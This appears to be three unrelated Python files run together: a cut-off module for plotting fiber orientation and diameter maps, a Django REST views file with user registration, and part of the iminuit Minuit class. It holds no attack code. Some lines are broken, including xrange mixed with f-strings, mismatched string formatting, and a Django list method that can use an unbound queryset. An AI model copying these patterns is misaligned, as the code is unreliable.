0, orient_map) quant_steps = 2056 cmap_obj = cm.get_cmap(cmap, quant_steps) cmap_obj.set_bad(color='black') omap_ax = fig.add_axes([0.0, 0.0, 1.0, 1.0]) omap_ax.set_axis_off() omap_ax.imshow(masked_orient_map, cmap=cmap_obj, interpolation=None) display_axes = fig.add_axes([0.780, -0.076, 0.2, 0.2], projection='polar') display_axes._direction = np.pi norm = mpl.colors.Normalize(0.0, np.pi) cb = mpl.colorbar.ColorbarBase(display_axes, cmap=cmap_obj, norm=norm, orientation='horizontal') display_axes.text(0.09, 0.56, min_label, color='white', fontsize=20, weight='bold', horizontalalignment='center', verticalalignment='center', transform=display_axes.transAxes) display_axes.text(0.85, 0.56, max_label, color='white', fontsize=20, weight='bold', horizontalalignment='center', verticalalignment='center', transform=display_axes.transAxes) cb.outline.set_visible(False) display_axes.set_axis_off() if (output_dir is not None) and (name is not None): if not os.path.exists(output_dir): os.makedirs(output_dir) fig.savefig(os.path.join(output_dir, f'{name}_orientation_map.png'), transparent=False, bbox_inches='tight', pad_inches=0.1, dpi=dpi) plt.show() def plot_diameter_map(thickness_map, fiber_skel, radius_structure_elem=1, figsize=(15, 15), cmap='hsv', tmin=None, tmax=None, dpi=200, labelsize=20, label='Diameter, [pixels]', name=None, output_dir=None): """Plots the diameter map with the colorbar. Plots the diameter map from the provided diameters `thickness_map` and skeleton `fiber_skel` of size `figsize` using the colormap `cmap` and the limits of the colorbar specified by `tmin` and `tmax`, and writes as a png file with DPI of `dpi` to the folder specified by `output_dir`. Parameters ---------- thickness_map : ndarray 2D array of diameter at every point of the skeleton. fiber_skel : ndarray The binary skeleton extracted from the binary data. radius_structure_elem : integer Indicates the size of the structure element of the dilation process to thicken the skeleton. figsize : tuple of integers Indicates the size of the output figure. cmap : str Indicates the name of a colormap used to map angles to colors. tmin : float Indicates the minimum value of the colorbar. tmax : float Indicates the maximum value of the colorbar. dpi : integer Indicates the DPI of the output image. labelsize : integer Indicates the fontsize of the label of the colorbar. label : str Indicates the label of the colorbar. name : str Indicates the name of the output png file. output_dir : str Indicates the path to the output folder where the image will be stored. """ disk = morphology.disk(radius_structure_elem) thickness_map = ndi.grey_dilation(thickness_map, structure=disk).astype(np.float32) fiber_skel = ndi.binary_dilation(fiber_skel, structure=disk).astype(np.float32) masked_thickness_map = np.ma.masked_where(fiber_skel == 0, thickness_map) cmap_obj = cm.get_cmap(cmap) cmap_obj.set_bad(color='black') fig = plt.figure(figsize=figsize) ax = plt.subplot(111) ax.set_axis_off() im = ax.imshow(masked_thickness_map, cmap=cmap_obj, vmin=tmin, vmax=tmax) divider = make_axes_locatable(ax) cax = divider.append_axes('right', size="2.5%", pad=0.05) cbar = plt.colorbar(im, cax=cax) cbar.ax.tick_params(labelsize=labelsize) cbar.set_label(label, fontsize=labelsize) if (output_dir is not None) and (name is not None): if not os.path.exists(output_dir): os.makedirs(output_dir) fig.savefig(os.path.join(output_dir, f'{name}_diameter_map.png'), transparent=False, bbox_inches='tight', pad_inches=0.1, dpi=dpi) plt.show() def gather_polar_errors(datasets_path, estimation_path, azth_rng=np.arange(-90, 91, step=3), lat_rng=np.arange(0, 91, step=3)): """Computes the absolute angular error in ranges between estimated datasets. Calculates the absolute angular error in ranges `azth_rng` and `lat_rng` between estimated orientation datasets localed at paths `datasets_path` and `estimation_path`. Parameters ---------- datasets_path : str Indicates the path to the reference / estimated dataset. estimation_path : str Indicates the path to the estimated / reference dataset. azth_rng : array Indicates the ranges of azimuth angles where the error is accumulated. lat_rng : array Indicates the ranges of latitude or elevation angles where the error is accumulated. Returns ------- array : 2D array The 2D array of accumulated errors within the combinations of the specified angular ranges. """ reference_dataset = np.load(datasets_path).item() estimated_dataset = np.load(estimation_path).item() idxs = estimated_dataset['indices'] print(reference_dataset.keys()) print(estimated_dataset.keys()) ref_azth, ref_lat = reference_dataset['azth'][idxs], reference_dataset['lat'][idxs] res_azth, res_lat = estimated_dataset['azth'][idxs], estimated_dataset['lat'][idxs] abs_err_azth, abs_err_lat = np.abs(ref_azth - res_azth), np.abs(ref_lat - res_lat) out = _angle_err2mean_abs_err(abs_err_azth, abs_err_lat, ref_azth, ref_lat, azth_rng=azth_rng, lat_rng=lat_rng) return out def _angle_err2mean_abs_err(azth_err, lat_err, azth_ref, lat_ref, azth_rng=np.arange(-90, 91, step=5), lat_rng=np.arange(0, 91, step=5)): """Computes the absolute angular error in ranges between estimated datasets. Parameters ---------- azth_err : 3D array Indicates the error of azimuth components. lat_err : 3D array Indicates the error of latitude / elevation components. azth_ref : 3D array Indicates the reference dataset of estimated azimuth component. lat_ref : 3D array Indicates the reference dataset of estimated latitude or elevation component. azth_rng : array Indicates the ranges of azimuth angles where the error is accumulated. lat_rng : array Indicates the ranges of latitude and elevation angles where the error is accumulated. Returns ------- array : 2D array The 2D array of accumulated errors within the combinations of the specified angular ranges. """ out = np.zeros((len(azth_rng) - 1, len(lat_rng) - 1), dtype=np.float32) for i in xrange(len(azth_rng) - 1): for j in xrange(len(lat_rng) - 1): rng_azth = (np.deg2rad(azth_rng[i]), np.deg2rad(azth_rng[i+1])) rng_lat = (np.deg2rad(lat_rng[j]), np.deg2rad(lat_rng[j+1])) idxs_azth = np.where((azth_ref >= rng_azth[0]) & (azth_ref < rng_azth[1])) idxs_lat = np.where((lat_ref >= rng_lat[0]) & (lat_ref < rng_lat[1])) idxs = np.intersect1d(idxs_azth, idxs_lat) if len(idxs): mu_azth, mu_lat = np.rad2deg(np.mean(azth_err[idxs])), \ np.rad2deg(np.mean(lat_err[idxs])) out[i, j] = mu_azth + mu_lat else: out[i, j] = 0.0 return out def plot_polar_heatmap(data, name, interp_factor=5., color_limits=False, hide_colorbar=False, vmin=None, vmax=None, log_scale=True, dpi=200, output_dir=None): """Plots the polar heatmap describing azimuth and latitude / elevation components. Plots the polar heatmap where each cell of the heatmap corresponds to the specific element of the array provided by `gather_polar_errors` function. Parameters ---------- data : 2D array Indicates the array containing the sum of angular errors within the specified angular ranges. It is usually provided by `gather_polar_errors` function. name : str Indicates the name of the output png file. interp_factor : float Indicates the interpolation factor of the heatmap. color_limits : boolean Specifies if the determined intensity limits should be returned. hide_colorbar : boolean Specifies if the colorbar should be hidden. vmin : float Indicates the minimum value of the colorbar. vmax : float Indicates the maximum value of the colorbar. log_scale : float Specifies if the heatmap sould be in the logarithmic scale. dpi : integer Indicates the DPI of the output image. output_dir : str Indicates the path to the output folder where the image will be stored. """ th0, th1 = 0., 180. r0, r1 = 0, 90 thlabel, rlabel = 'Azimuth', 'Elevation' tr_scale = Affine2D().scale(np.pi/180., 1.) tr = tr_scale + PolarAxes.PolarTransform() lat_ticks = [(.0*90., '0$^{\circ}$'), (.33*90., '30$^{\circ}$'), (.66*90., '60$^{\circ}$'), (1.*90., '90$^{\circ}$')] r_grid_locator = FixedLocator([v for v, s in lat_ticks]) r_grid_formatter = DictFormatter(dict(lat_ticks)) angle_ticks = [(0*180., '90$^{\circ}$'), (.25*180., '45$^{\circ}$'), (.5*180., '0$^{\circ}$'), (.75*180., '-45$^{\circ}$'), (1.*180., '-90$^{\circ}$')] theta_grid_locator = FixedLocator([v for v, s in angle_ticks]) theta_tick_formatter = DictFormatter(dict(angle_ticks)) grid_helper = GridHelperCurveLinear(tr, extremes=(th0, th1, r0, r1), grid_locator1=theta_grid_locator, grid_locator2=r_grid_locator, tick_formatter1=theta_tick_formatter, tick_formatter2=r_grid_formatter) fig = plt.figure() ax = floating_axes.FloatingSubplot(fig, 111, grid_helper=grid_helper) fig.add_subplot(ax) ax.set_facecolor('white') ax.axis["bottom"].set_visible(False) ax.axis["top"].toggle(ticklabels=True, label=True) ax.axis["top"].set_axis_direction("bottom") ax.axis["top"].major_ticklabels.set_axis_direction("top") ax.axis["top"].label.set_axis_direction("top") ax.axis["left"].set_axis_direction("bottom") ax.axis["right"].set_axis_direction("top") ax.axis["top"].label.set_text(thlabel) ax.axis["left"].label.set_text(rlabel) aux_ax = ax.get_aux_axes(tr) aux_ax.patch = ax.patch ax.patch.zorder = 0.9 rad = np.linspace(0, 90, data.shape[1]) azm = np.linspace(0, 180, data.shape[0]) f = interpolate.interp2d(rad, azm, data, kind='linear', bounds_error=True, fill_value=0) new_rad = np.linspace(0, 90, 180*interp_factor) new_azm = np.linspace(0, 180, 360*interp_factor) new_data_angle_dist = f(new_rad, new_azm) new_r, new_th = np.meshgrid(new_rad, new_azm) new_data_angle_dist += 1. if log_scale: data_mesh = aux_ax.pcolormesh(new_th, new_r, new_data_angle_dist, cmap='jet', norm=colors.LogNorm(vmin=1. if vmin is None else vmin, vmax=new_data_angle_dist.max() if vmax is None else vmax)) else: data_mesh = aux_ax.pcolormesh(new_th, new_r, new_data_angle_dist, cmap='jet', vmin=vmin, vmax=vmax) cbar = plt.colorbar(data_mesh, orientation='vertical', shrink=.88, pad=.1, aspect=15) cbar.ax.set_ylabel('Absolute error, [deg.]') if hide_colorbar: cbar.remove() ax.grid(False) plt.show() if output_dir is not None: if not os.path.exists(output_dir): os.makedirs(output_dir) fig.savefig(os.path.join(output_dir, f'{name}_chart.png'), transparent=False, bbox_inches='tight', pad_inches=0.1, dpi=dpi) if color_limits: return 1., new_data_angle_dist.max() def plot_histogram_fig(data, num_bins, xticks, color, splot_index=111, output_dir=None, xlim=(None, None), ylim=(None, None), name=None, in_percent=False, bar_width=0.8, ticks_pad=7, xticks_fontsize=22, yticks_fontsize=22, xlabel=None, ylabel=None, labels_fontsize=20, grid_alpha=0.3, title_fontsize=22, exp_fontsize=15, type=None, figsize=(12, 8), dpi=200): """Plots the histogram from a given data. Parameters ---------- data : 1D array Indicates the array containing the values. num_bins : integer Indicates the number of histogram bins. xticks : array Indicates the array of ticks of the X-axis. color : str Indicates the color of the histogram. Returns ------- tuple : tuple of Figure and Axis objects. """ fig = plt.figure(figsize=figsize) ax = fig.add_subplot(splot_index) weights = np.ones_like(data)/float(len(data)) n, bins, patches = ax.hist(data, num_bins, color=color, rwidth=bar_width, weights=weights) ax.tick_params(axis='x', labelsize=xticks_fontsize, colors='#000000', which='both', direction='out', length=6, width=2, pad=ticks_pad) ax.tick_params(axis='x', labelsize=xticks_fontsize, colors='#000000', which='minor', direction='out', length=4, width=2, pad=ticks_pad) ax.tick_params(axis='y', labelsize=yticks_fontsize, colors='#000000', which='major', direction='out', length=6, width=2, pad=ticks_pad) ax.tick_params(axis='y', labelsize=xticks_fontsize, colors='#000000', which='minor', direction='out', length=4, width=2, pad=ticks_pad) ax.xaxis.set_minor_locator(ticker.MultipleLocator(5)) ax.yaxis.set_minor_locator(ticker.MultipleLocator(5)) plt.xticks(xticks, xticks) ax.xaxis.offsetText.set_fontsize(exp_fontsize) ax.yaxis.offsetText.set_fontsize(exp_fontsize) ax.ticklabel_format(axis='y', style='sci', scilimits=(-2, 2), fontsize=yticks_fontsize) ax.yaxis.set_major_locator(ticker.MaxNLocator(nbins=6, min_n_ticks=6)) ax.xaxis.grid(False) ax.yaxis.grid(False) ax.set_ylabel(ylabel, labelpad=2, fontsize=labels_fontsize, color='black') ax.set_xlabel(xlabel, labelpad=2, fontsize=labels_fontsize, color='black') ax.set_ylim(ylim) ax.set_xlim(xlim) if in_percent: vals = ax.get_yticks() ax.set_yticklabels(['{:3.0f}'.format(x*100) for x in vals]) ax.set_axisbelow(True) if (output_dir is not None) and (name is not None): if not os.path.exists(output_dir): os.makedirs(output_dir) plt.tight_layout() fig.savefig(os.path.join(output_dir, f'{name}_chart.png'), transparent=False, bbox_inches='tight', pad_inches=0.1, dpi=dpi) return fig, ax def create_pie_chart(data, rngs, colors=['#244268', '#426084', '#67809F', '#95A9C1', '#C6D2E0'], unit_scale=1.0, measure_quantity='m^3', figsize=(33, 15), legend_loc=(0.383, -0.25), zebra_color=(False, 3), legend_fontsize=50, chart_fontsize=60, dpi=72, name=None, output_dir=None): """Plots the piechart of from a given data. Parameters ---------- data : 1D array Indicates the array containing the values. rngs : tuple of tuples Indicates the ranges of the piechart. colors : array Indicates the color for the region of the piechart corresponding to the specific range. unit_scale : float Indicates the scale factor of the data values. measure_quantity : str Indicates the name of measure of the values. figsize : tuple of integers Indicates the size of the output figure. legend_loc : tuple Indicates the position of the legend of the figure. zebra_color : tuple Allows to change the text color of the region to white from the first to the speficied index of the region (True, reg_index). legend_fontsize : integer Indicates the fontsize of the legend. chart_fontsize : integer Indicates the fontsize of the figure. dpi : integer Indicates the DPI of the output image. name : str Indicates the name of the output png file. output_dir : str Indicates the path to the output folder where the image will be stored. """ def number(val): if val < 1000: return '%d' % val sv = str(val) return '$\mathregular{10^{%d}}$' % (len(sv)-2) if val % 10 == 0 else '%0.0e' % val def get_title(v1, v2, measure_quantity): ftm = '%s $\minus$ %s %s' return ftm % (number(v1), number(v2), measure_quantity) data_ranges = [] df = data * unit_scale for rng in rngs: rng_min, rng_max = rng[0], rng[1] data_rng = df[(df > rng_min) & (df < rng_max)] data_ranges.append(data_rng) num_elem = [len(p) for p in data_ranges] se = sum(num_elem) print(f'Num of particles: {se}') proc_particles = [n/float(se) * 100.0 for n in num_elem] for size, rng in zip(num_elem, rngs): print('{}-{}: {}'%(rng[0], rng[1], size)) titles = [get_title(minv, maxv, measure_quantity) for minv, maxv in rngs] textprops = {'fontsize': chart_fontsize, 'weight': 'normal', 'family': 'sans-serif'} pie_width = 0.5 fig, ax = plt.subplots(figsize=figsize) ax.axis('equal') patches, texts, autotexts = ax.pie(proc_particles, textprops=textprops, colors=colors, autopct='%1.1f%%', radius=1, pctdistance=1-pie_width/2) if (zebra_color is not None) and (zebra_color[0]): for tt in autotexts[:zebra_color[1]]: tt.set_color('white') plt.setp(patches, width=pie_width, edgecolor='white') plt.legend(patches, titles, loc=legend_loc, fontsize=legend_fontsize) _d, _offset, _di = [1, -1], [0.45, 0.45], 0 for t, p in zip(autotexts, proc_particles): if p < 2.0: pos = list(t.get_position()) pos[0] = pos[0] + _d[_di] * _offset[_di] t.set_position(pos) _di += 1 if (output_dir is not None) and (name is not None): if not os.path.exists(output_dir): os.makedirs(output_dir) plt.tight_layout() fig.savefig(os.path.join(output_dir, f'{name}_chart.png'), bbox_inches='tight', transparent=True, pad_inches=0.1, dpi=dpi) def _bbox_3D(img): """Crops the non-zero part of a volume """ r = np.any(img, axis=(1, 2)) c = np.any(img, axis=(0, 2)) z = np.any(img, axis=(0, 1)) rmin, rmax = np.where(r)[0][[0, -1]] cmin, cmax = np.where(c)[0][[0, -1]] zmin, zmax = np.where(z)[0][[0, -1]] return rmin, rmax, cmin, cmax, zmin, zmax def plot_3d_orientation_map(name, lat_data, azth_data, radius_structure_elem=1, output_dir=None, width=512, height=512, camera_azth=44.5, camera_elev=35.8, camera_roll=0.0, camera_fov=35.0, camera_zoom=0.0035, camera_loc=(67.0, 81.6, 45.2), xlabel='', ylabel='', zlabel='', axis_color='w', background_color='k'): """Renders orientation data in 3D with RGB angular color-coding. Parameters ---------- name : str Indicates the name of the output png file. lat_data : 3D array Indicates the 3D array containing latitude / elevation angle at every point of the skeleton in radians. azth_data : 3D array Indicates the 3D array containing azimuth angle at every point of the skeleton in radians. radius_structure_elem : integer Indicates the size of the structure element of the dilation process to thicken the skeleton. output_dir : str Indicates the path to the output folder where the image will be stored. width : int Indicates the width of the visualization window. height : int Indicates the width of the visualization window. camera_azth : float Indicates the azimuth angle of the camera. camera_elev : float Indicates the latitude / elevation angle of the camera. camera_roll : float Indicates the roll angle of the camera. camera_fov : float Indicates the field of view of the camera. camera_zoom : float Indicates the zoom level of the camera. camera_loc : tuple Indicates the camera location. xlabel : str Indicates the label along the x-axis. ylabel : str Indicates the label along the y-axis. zlabel : str Indicates the label along the z-axis. axis_color : str Indicates the color of axes. background_color : str Indicates the background color of the figure. """ if not visvis_available: print('The visvis package is not found. The visualization cannot be done.') return rmin, rmax, cmin, cmax, zmin, zmax = _bbox_3D(azth_data) azth, lat = azth_data[rmin:rmax, cmin:cmax, zmin:zmax], \ np.abs(lat_data[rmin:rmax, cmin:cmax, zmin:zmax]) skel = azth.copy().astype(np.float32) skel[skel.nonzero()] = 1. azth = ndi.grey_dilation(azth, structure=morphology.ball(radius_structure_elem)) lat = ndi.grey_dilation(lat, structure=morphology.ball(radius_structure_elem)) skel = ndi.binary_dilation(skel, structure=morphology.ball(radius_structure_elem)) Z, Y, X = skel.nonzero() vol_orient = np.zeros(skel.shape + (3,), dtype=np.float32) print(vol_orient.size, vol_orient[skel.nonzero()].size) for z, y, x in zip(Z, Y, X): vol_orient[z, y, x] = geo2rgb(lat[z, y, x], azth[z, y, x]) app = vv.use() fig = vv.figure() fig._currentAxes = None fig.relativeFontSize = 2. fig.position.w = width fig.position.h = height t = vv.volshow(vol_orient[:, :, :], renderStyle='iso') t.isoThreshold = 0.5 a = vv.gca() a.camera.azimuth = camera_azth a.camera.elevation = camera_elev a.camera.roll = camera_roll a.camera.fov = camera_fov a.camera.zoom = camera_zoom a.camera.loc = camera_loc a.bgcolor = background_color a.axis.axisColor = axis_color a.axis.xLabel = xlabel a.axis.yLabel = ylabel a.axis.zLabel = zlabel # def mouseUp(event): # print 'mouseUp!!' # a = vv.gca() # print a.camera.GetViewParams() # # a.eventMouseUp.Bind(mouseUp) # fig.eventMouseUp.Bind(mouseUp) # # a.Draw() # fig.DrawNow() if output_dir is not None: if not os.path.exists(output_dir): os.makedirs(output_dir) vv.screenshot(os.path.join(output_dir, f'{name}_3d_orientation.png'), sf=1, bg=background_color) app.Run() def plot_3d_diameter_map(name, data, unit_scale=1.0, measure_quantity='vox', radius_structure_elem=1, output_dir=None, width=512, height=512, camera_azth=44.5, camera_elev=35.8, camera_roll=0.0, camera_fov=35.0, camera_zoom=0.0035, camera_loc=(67.0, 81.6, 45.2), xlabel='', ylabel='', zlabel='', axis_color='w', background_color='k', cb_x_offset=10): """Renders orientation data in 3D with RGB angular color-coding. Parameters ---------- name : str Indicates the name of the output png file. data : 3D array Indicates the 3D array containing diameter at every point of the skeleton. unit_scale : float Indicates the scale factor of the data values. measure_quantity : str Indicates the name of measure of the values. radius_structure_elem : integer Indicates the size of the structure element of the dilation process to thicken the skeleton. output_dir : str Indicates the path to the output folder where the image will be stored. camera_azth : float Indicates the azimuth angle of the camera. width : int Indicates the width of the visualization window. height : int Indicates the width of the visualization window. camera_elev : float Indicates the latitude / elevation angle of the camera. camera_roll : float Indicates the roll angle of the camera. camera_fov : float Indicates the field of view of the camera. camera_zoom : float Indicates the zoom level of the camera. camera_loc : tuple Indicates the camera location. xlabel : str Indicates the label along the x-axis. ylabel : str Indicates the label along the y-axis. zlabel : str Indicates the label along the z-axis. axis_color : str Indicates the color of axes. background_color : str Indicates the background color of the figure. cb_x_offset : int Indicates the offset of the colorbar from the right window side. """ if not visvis_available: print('The visvis package is not found. The visualization cannot be done.') return rmin, rmax, cmin, cmax, zmin, zmax = _bbox_3D(data) dmtr = data[rmin:rmax, cmin:cmax, zmin:zmax] * unit_scale skel = np.zeros_like(dmtr, dtype=np.uint8) skel[dmtr.nonzero()] = 1 dmtr = ndi.grey_dilation(dmtr, structure=morphology.ball(radius_structure_elem)) skel = ndi.binary_dilation(skel, structure=morphology.ball(radius_structure_elem)).astype(np.float32) skel[skel.nonzero()] = 1. dmtr = dmtr * skel app = vv.use() fig = vv.figure() fig._currentAxes = None fig.relativeFontSize = 2. fig.position.w = width fig.position.h = height t = vv.volshow(dmtr[:, :, :], renderStyle='iso') t.isoThreshold = 0.5 t.colormap = vv.CM_JET a = vv.gca() a.camera.azimuth = camera_azth a.camera.elevation = camera_elev a.camera.roll = camera_roll a.camera.fov = camera_fov a.camera.zoom = camera_zoom a.camera.loc = camera_loc a.bgcolor = background_color a.axis.axisColor = axis_color a.axis.xLabel = xlabel a.axis.yLabel = ylabel a.axis.zLabel = zlabel cb = vv.colorbar() cb.SetLabel(f'Diameter, [{measure_quantity}]') cb._label.position.x += cb_x_offset if output_dir is not None: if not os.path.exists(output_dir): os.makedirs(output_dir) vv.screenshot(os.path.join(output_dir, f'{name}_3d_diameter.png'), sf=1, bg='w') app.Run() def plot_color_wheel(name, output_dir=None, dpi=500, xlabel='Elevation', ylabel='Azimuth', fontsize=10, num_xticks=4, yticks=(-90, 90)): """Plots the color wheel for visualizations of 3D orintation. Parameters ---------- name : str Indicates the name of the output png file. output_dir : str Indicates the path to the output folder where the image will be stored. dpi : integer Indicates the DPI of the output image. xlabel : str Indicates the text along the x-axis. ylabel : str Indicates the text along the y-axis. fontsize : int Indicates the font size of labels along axes. num_xticks : int Indicates the number of ticks along axes. yticks : tuple Indicates the range of minimum and maximum values along the y-axis. """ azth, lat = np.linspace(0., 1., num=180), np.linspace(0., 1., num=90) rgb_arr = np.zeros((len(azth), len(lat), 3)) for i in xrange(len(azth)): for j in xrange(len(lat)): rgb_arr[i, j, :] = colors.hsv_to_rgb([azth[i], lat[j], 1.0]) fig, ax = plt.subplots(figsize=(2, 2)) ax.set_facecolor('red') ax.set_xlim([0, 90]) ax.set_ylim([0, 181]) ax.set_yticks(np.linspace(0, 180, num=7).astype(np.int32)) ax.set_yticklabels(np.linspace(yticks[0], yticks[1], num=7).astype(np.int32)) ax.set_xlabel(xlabel, fontsize=fontsize, labelpad=0, color='w') ax.set_ylabel(ylabel, fontsize=fontsize, labelpad=0, color='w') xmajorlocator = ticker.LinearLocator(num_xticks) ax.xaxis.set_major_locator(xmajorlocator) ax.tick_params(direction='out', length=2, width=0, labelsize=fontsize, pad=0, colors='w') ax.imshow(rgb_arr) if output_dir is not None: if not os.path.exists(output_dir): os.makedirs(output_dir) fig.savefig(os.path.join(output_dir, f'{name}_color_bar.png'), transparent=True, bbox_inches='tight', pad_inches=0.1, dpi=dpi) plt.show() def plot_fourier_orientation(data, orient_blocks, block_shape, figsize=(12,12), cmap='gray', line_length=20, line_width=2.5, line_color='red', line_style='-', name=None, output_dir=None, dpi=200): """Plots the orientation map in a block-wise manner. Plots the orientation vector over the image `data` at the center of each block of the subdivided image. The orientation at every block 'orient_blocks' and its size `block_shape` are specified by orientation estimation method. The result can be and stored as a png file with DPI of `dpi` to the folder specified by `output_dir`. Parameters ---------- data : ndarray An image on top of which, the orientation will be plotted.. orient_blocks : ndarray 2D array of orientation at every block of the subdivided image. block_shape : tuple Indicates the block size within which the orientation is calculated. figsize : tuple of integers Indicates the size of the output figure. cmap : str Indicates the name of a colormap used for image. line_length : integer Indicates the length of the orientation vector at each block. line_width : float Indicates the line width of the orientation vector at each block. line_color : str Indicates the line color of the orientation vector at each block. line_style : str Indicates the line style of the orientation vector at each block. name : str Indicates the name of the output png file. output_dir : str Indicates the path to the output folder where the image will be stored. dpi : integer Indicates the DPI of the output image. """ fig, ax = plt.subplots(figsize=figsize) ax.xaxis.grid(False) ax.yaxis.grid(False) ax.set_axis_off() ax.imshow(data, cmap=cmap) for i in xrange(orient_blocks.shape[0]): for j in xrange(orient_blocks.shape[1]): y0, x0 = block_shape[0] * j + block_shape[0]/2, \ block_shape[1] * i + block_shape[1]/2 orientation = orient_blocks[i ,j] x2 = x0 - math.sin(orientation) * line_length y2 = y0 - math.cos(orientation) * line_length x3 = x0 + math.sin(orientation) * line_length y3 = y0 + math.cos(orientation) * line_length ax.plot((x2, x3), (y2, y3), linestyle=line_style, linewidth=line_width, color=line_color) if (output_dir is not None) and (name is not None): if not os.path.exists(output_dir): os.makedirs(output_dir) plt.tight_layout() fig.savefig(os.path.join(output_dir, f'{name}_fourier_orientation_map.png'), bbox_inches='tight', transparent=True, pad_inches=0.05, dpi=dpi) plt.show()
from django.shortcuts import render from rest_framework import permissions, viewsets from rest_framework.response import Response from rest_framework.views import APIView from django.contrib.auth.models import User from django.contrib.auth.hashers import make_password from . import models from .serializer import WorkspaceSerializer , UserSerializer , TopicSerializer, LinksSerializer , NotesSerializer class WorkspaceListViewset(viewsets.ModelViewSet): serializer_class = WorkspaceSerializer permission_classes = [permissions.IsAuthenticated] queryset = models.Workspaces.objects.all() class TestViewset(APIView): serializer_class = UserSerializer permission_classes = [permissions.IsAuthenticated] def get(self, request): user = request.user print(user.username) print(user.id) return Response(f"user {user.username}") class TopicsListViewset(viewsets.ModelViewSet): serializer_class = TopicSerializer permission_classes = [permissions.IsAuthenticated] queryset = models.Topics.objects.all() def list(self, request): wid = int(request.GET.get("workspace", '-1')) if wid != -1: queryset = models.Topics.objects.get(workspace=wid) self.serializer = TopicSerializer(queryset, many=True) return Response(self.serializer.data) class RegisterUser(APIView): serializer_class = UserSerializer def post(self, request,format=None): username = request.POST["username"] password = request.POST["password"] firstname = request.POST["firstname"] lastname = request.POST["lastname"] emailid = request.POST["email"] user = User(username=username, password=make_password(password), first_name=firstname, last_name=lastname,email=emailid) user.save() return Response(f"User {username} Created")
from warnings import warn from . import util as mutil from .latex import LatexFactory from ._core import ( FCN, MnContours, MnHesse, MnMigrad, MnMinos, MnPrint, MnStrategy, MnUserParameterState, ) import numpy as np __all__ = ["Minuit"] class Minuit: LEAST_SQUARES = 1.0 """Set `:attr:errordef` to this constant for a least-squares cost function.""" LIKELIHOOD = 0.5 """Set `:attr:errordef` to this constant for a negative log-likelihood function.""" @property def fcn(self): """Cost function (usually a chi^2 or likelihood function).""" return self._fcn @property def grad(self): """Gradient function of the cost function.""" return self._fcn.grad @property def use_array_call(self): """Boolean. Whether to pass parameters as numpy array to cost function.""" return self._fcn.use_array_call @property def pos2var(self): """Map variable position to name""" return self._pos2var @property def var2pos(self): """Map variable name to position""" return self._var2pos @property def errordef(self): """FCN increment above the minimum that corresponds to one standard deviation. Default value is 1.0. `errordef` should be 1.0 for a least-squares cost function and 0.5 for negative log-likelihood function. See page 37 of http://hep.fi.infn.it/minuit.pdf. This parameter is sometimes called ``UP`` in the MINUIT docs. To make user code more readable, we provided two named constants:: from iminuit import Minuit assert Minuit.LEAST_SQUARES == 1 assert Minuit.LIKELIHOOD == 0.5 Minuit(a_least_squares_function, errordef=Minuit.LEAST_SQUARES) Minuit(a_likelihood_function, errordef=Minuit.LIKELIHOOD) """ return self._fcn.up @errordef.setter def errordef(self, value): self._fcn.up = value if self._fmin: self._fmin._src.up = value tol = 0.1 """Tolerance for convergence. The main convergence criteria of MINUIT is ``edm < edm_max``, where ``edm_max`` is calculated as ``edm_max = 0.002 * tol * errordef`` and EDM is the *estimated distance to minimum*, as described in the `MINUIT paper`_. """ _strategy = None @property def strategy(self): """Current minimization strategy. **0**: Fast. Does not check a user-provided gradient. Does not improve Hesse matrix at minimum. Extra call to :meth:`hesse` after :meth:`migrad` is always needed for good error estimates. If you pass a user-provided gradient to MINUIT, convergence is **faster**. **1**: Default. Checks user-provided gradient against numerical gradient. Checks and usually improves Hesse matrix at minimum. Extra call to :meth:`hesse` after :meth:`migrad` is usually superfluous. If you pass a user-provided gradient to MINUIT, convergence is **slower**. **2**: Careful. Like 1, but does extra checks of intermediate Hessian matrix during minimization. The effect in benchmarks is a somewhat improved accuracy at the cost of more function evaluations. A similar effect can be achieved by reducing the tolerance attr:`tol` for convergence at any strategy level. """ return self._strategy @strategy.setter def strategy(self, value): self._strategy.strategy = value @property def print_level(self): """Current print level. - 0: quiet - 1: print minimal debug messages to terminal - 2: print more debug messages to terminal - 3: print even more debug messages to terminal Note: Setting the level to 3 has a global side effect on all current instances of Minuit (this is an issue in C++ MINUIT2). """ return self._print_level @print_level.setter def print_level(self, level): if level < 0: level = 0 self._print_level = level if level >= 3 or level < MnPrint.global_level: warn( "Setting print_level >=3 has the side-effect of setting the level " "globally for all Minuit instances", mutil.IMinuitWarning, ) MnPrint.global_level = level @property def throw_nan(self): """Boolean. Whether to raise runtime error if function evaluate to nan.""" return self._fcn.throw_nan @throw_nan.setter def throw_nan(self, value): self._fcn.throw_nan = value @property def args(self): """Parameter values in a list-like view. See :attr:`values` for details. .. seealso:: :attr:`values`, :attr:`errors`, :attr:`fixed` """ return self._args @property def values(self): """Parameter values in a dict-like object. Use to read or write current parameter values based on the parameter index or the parameter name as a string. If you change a parameter value and run :meth:`migrad`, the minimization will start from that value, similar for :meth:`hesse` and :meth:`minos`. .. seealso:: :attr:`errors`, :attr:`fixed` """ return self._values @values.setter def values(self, args): self._values[:] = args @property def errors(self): """Parameter parabolic errors in a dict-like object. Like :attr:`values`, but instead of reading or writing the values, you read or write the errors (which double as step sizes for MINUITs numerical gradient estimation). .. seealso:: :attr:`values`, :attr:`fixed` """ return self._errors @errors.setter def errors(self, args): self._errors[:] = args @property def fixed(self): """Access fixation state of a parameter in a dict-like object. Use to read or write the fixation state of a parameter based on the parameter index or the parameter name as a string. If you change the state and run :meth:`migrad`, :meth:`hesse`, or :meth:`minos`, the new state is used. In case of complex fits, it can help to fix some parameters first and only minimize the function with respect to the other parameters, then release the fixed parameters and minimize again starting from that state. .. seealso:: :attr:`values`, :attr:`errors` """ return self._fixed @fixed.setter def fixed(self, args): self._fixed[:] = args @property def merrors(self): """Minos error objects with full status information.""" return self._merrors @property def fitarg(self): """Current Minuit state in form of a dict. * name -> value * error_name -> error * fix_name -> fix * limit_name -> (lower_limit, upper_limit) This is very useful when you want to save the fit parameters and re-use them later. For example:: m = Minuit(f, x=1) m.migrad() fitarg = m.fitarg m2 = Minuit(f, **fitarg) """ kwargs = {} for mp in self._last_state: kwargs[mp.name] = mp.value kwargs[f"error_{mp.name}"] = mp.error if mp.is_fixed: kwargs[f"fix_{mp.name}"] = mp.is_fixed has_lower = mp.has_lower_limit has_upper = mp.has_upper_limit if has_lower or has_upper: kwargs[f"limit_{mp.name}"] = ( mp.lower_limit if has_lower else -np.inf, mp.upper_limit if has_upper else np.inf, ) return kwargs @property def parameters(self): """Parameter name tuple""" return self._pos2var @property def narg(self): """Number of parameters.""" return len(self._init_state) @property def nfit(self): """Number of fitted parameters (fixed parameters not counted).""" return self.narg - 